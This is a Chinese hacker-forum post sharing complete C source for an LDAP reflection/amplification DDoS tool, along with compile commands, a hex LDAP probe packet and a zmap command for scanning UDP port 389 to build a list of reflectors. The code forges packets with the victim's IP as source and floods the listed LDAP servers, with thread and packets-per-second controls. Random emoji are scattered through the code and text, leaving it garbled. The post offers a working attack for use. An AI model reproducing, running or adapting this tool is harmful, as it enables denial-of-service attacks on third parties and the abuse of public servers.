书是好东西啊,打开时能触动心灵,合上时能触动敌人的脑袋,这样好的东西真是令人喜欢啊 收藏本站
登陆 / 注册 搜索

阅读:1394   回复: 1

ldap放大DDOS

[复制链接]
黑客小王 「龙战于野」 2025-2-23 01:05 来自手机 |显示全部楼层

我是黑客阿尔法

ldap放大汉化源码
安装环境指令:
乌班图/Debian系统:
apt install gcc -y
centos系统:
✋💈🎂↔🐅‏yum install gcc -y
编译指令:
gcc ldap.c -o ldap -pthread -std=gnu99
最后输入
./ldap
🤞🚘🍖🅰🐅‎查看使用方法
注意:本脚本完全开源免费,请勿使用任何已编译版本,使用本脚本必须拥有root权限,否则无法运行该脚本
如何扫描列表呢?请输入一下指令:
组成探针:
echo -ne '30\x84\x00\x00\x00\x2D\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0A\x01\x00\x0A\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0B\x6F\x62\x6A\x65\x63\x74\x63\x6C\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00\x0A' > ldap.pkt

👍🌦🥛☯🐝‎

扫描指令:
zmap -p 389 --probe-module=udp --probe-args="file:ldap.pkt" --output-file=ldap.txt



👎🚠🦀⁉🐡‌
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>🥷‌👜✏🤖🤝
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
👂🚠🥩⁉🐞‍#include <arpa/inet.h>
#include <strings.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;

👍⛴🥭♑🪶‍

struct list
{
    struct sockaddr_in data;
    struct list *next;
    struct list *prev;

👩‍✈️‌👠💰🤖🤛


};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
👂🌞🍚➡🐅‌volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
    int i;👵‍🛍😥🤟
    Q[0] = x;
    Q[1] = x + PHI;
    Q[2] = x + PHI + PHI;
    for (i = 3; i < 4096; i++)
    {👨‍🎨‍👔💶🙂🤙
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
    }
}
uint32_t rand_cmwc(void)
{👵‌🛍🪣😫👃
    uint64_t t, a = 18782LL;
    static uint32_t i = 4095;
    uint32_t x, r = 0xfffffffe;
    i = (i + 1) & 4095;
    t = a * Q[i] + c;🧓‎👠🧻☠🦷
    c = (t >> 32);
    x = t + c;
    if (x < c) {
    x++;
    c++;👨‍⚕️‏🪖⚒😈👆
    }
    return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{

👏🔥🍏🚷🦦‍

    unsigned long sum = 0;
    for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
👍⛵🥄🆘🐙‍    return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
    iph->ihl = 5;🧑‍💻‎👗🖨😀
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 67;
    iph->id = htons(54321);
    iph->frag_off = 0;
🙏🚤🍒🚭🐶‍    iph->ttl = MAXTTL;
    iph->protocol = IPPROTO_UDP;
    iph->check = 0;
    iph->saddr = inet_addr("192.168.3.100");
}🧒‏🦺🗡😃💪
void setup_udp_header(struct udphdr *udph)
{
    udph->source = htons(5678);
    udph->dest = htons(389);
    udph->check = 0;👨‍🚒‏🥾🩸☠👂
    memcpy((void *)udph + sizeof(struct udphdr), "\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00", 67);
    udph->len=htons(sizeof(struct udphdr) + 67);
}
void *flood(void *par1)
{
👆🌧🌰🅰🐢‍    struct thread_data *td = (struct thread_data *)par1;
    char datagram[MAX_PACKET_SIZE];
    struct iphdr *iph = (struct iphdr *)datagram;
    struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
    struct sockaddr_in sin = td->sin;
🦷🚐🎂🆘🦕‌    struct  list *list_node = td->list_node;
    int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    if(s < 0){
    printf("无法打开原始套接字,请问是否root?\n");
    exit(-1);🥷‌👞🪣😇🤛
    }
    init_rand(time(NULL));
    memset(datagram, 0, MAX_PACKET_SIZE);
    setup_ip_header(iph);
    setup_udp_header(udph);👳‏🦺⚒😚👍
    udph->source = htons(rand() % 65535 - 1026);
    iph->saddr = sin.sin_addr.s_addr;
    iph->daddr = list_node->data.sin_addr.s_addr;
    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
    int tmp = 1;🧑‍🌾‎🧦🪦😡🙏
    const int *val = &tmp;
    if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
    printf("无法设置IP_HDRINCL 请问是否root?\n");
    exit(-1);
    }

🧑‍🌾‍🩴🪓🥰👀


    init_rand(time(NULL));
    register unsigned int i;
    i = 0;
    while(1){
        sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
🤙🏫🍪☣🕊‎        list_node = list_node->next;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        🧑‍🍳‌👞🧯😉👎
        pps++;
        if(i >= limiter)
        {
            i = 0;
            usleep(sleeptime);
✋🎠🍟❌🐙‏        }
        i++;
    }
}
int main(int argc, char *argv[ ])

👁🫖🚭🐶‍

{
    if(argc < 6){
        printf("无效的参数\n");
        fprintf(stdout, "用法: %s <IP> <端口> <LDAP 列表> <线程> <每秒pps限制 (-1无限制)> <时间>\n", argv[0]);
        exit(-1);
🤞⛪🫖🚷🐤‍    }
    srand(time(NULL));
    int i = 0;
    head = NULL;
    printf("[+] 开始攻击... [+]\n");

🧓‍🥾📱🤑🤞


    int max_len = 128;
    char *buffer = (char *) malloc(max_len);
    buffer = memset(buffer, 0x00, max_len);
    int num_threads = atoi(argv[4]);
    int maxpps = atoi(argv[5]);🧒‏🥾📬🙃✍
    limiter = 0;
    pps = 0;
    int multiplier = 20;
    FILE *list_fd = fopen(argv[3],  "r");
    while (fgets(buffer, max_len, list_fd) != NULL) {
💪🚐🫑🦜‎        if ((buffer[strlen(buffer) - 1] == '\n') ||
                (buffer[strlen(buffer) - 1] == '\r')) {
            buffer[strlen(buffer) - 1] = 0x00;
            if(head == NULL)
            {
🤞🗽🦀🉑🦉‍                head = (struct list *)malloc(sizeof(struct list));
                memset(&head->data, 0, sizeof(head->data));
                head->data.sin_addr.s_addr=inet_addr(buffer);
                head->next = head;
                head->prev = head;👩‎🩴🪣🥰👌
            } else {
                struct list *new_node = (struct list *)malloc(sizeof(struct list));
                memset(new_node, 0x00, sizeof(struct list));
                new_node->data.sin_addr.s_addr=inet_addr(buffer);
                new_node->prev = head;

👩‍🩲🗝😡👁


                new_node->next = head->next;
                head->next = new_node;
            }
            i++;
        } else {🧑‍🎤‌🕶🧲😳🤟
            continue;
        }
    }
    struct list *current = head->next;
    pthread_t thread[num_threads];🧑‍🍳‍👠⚔😰👃
    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    struct thread_data td[num_threads];
    for(i = 0;i<num_threads;i++){

👳‏💄💶😔💪


        td[i].thread_id = i;
        td[i].sin= sin;
        td[i].list_node = current;
        pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
    }

👨‍🚒‍🛍🪓😇👍


    for(i = 0;i<(atoi(argv[6])*multiplier);i++)
    {
        usleep((1000/multiplier)*1000);
        if((pps*multiplier) > maxpps)
        {🧑‍🌾‍🩴✒💩🤟
            if(1 > limiter)
            {
                sleeptime+=100;
            } else {
                limiter--;
👂🗽🍧🐉‌            }
        } else {
            limiter++;
            if(sleeptime > 25)
            {👨‍⚕️‍💍💳😡👆
                sleeptime-=25;
            } else {
                sleeptime = 0;
            }
        }
🤳🗺🧊♂‏        pps = 0;
    }
    return 0;
}
上一篇
下一篇
帖子热度 1404 ℃


香风嫣然 「初入古黑」 2025-2-23 01:07 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

虽然今天什么也没干‍‍,但还是辛苦我了‍。
    

返回列表 发新帖
高级模式
您需要登录后才可以回帖 登录 | 免费注册  

本版积分规则

关于本站大事记小黑屋 网站地图

GMT+8, 2025-7-7 08:21 , Processed in 0.019341 second(s), 17 queries , Redis On.

Copyright © 2015-2025古黑论

Powered by Discuz! X3.4Comsenz Inc.

快速回复 返回列表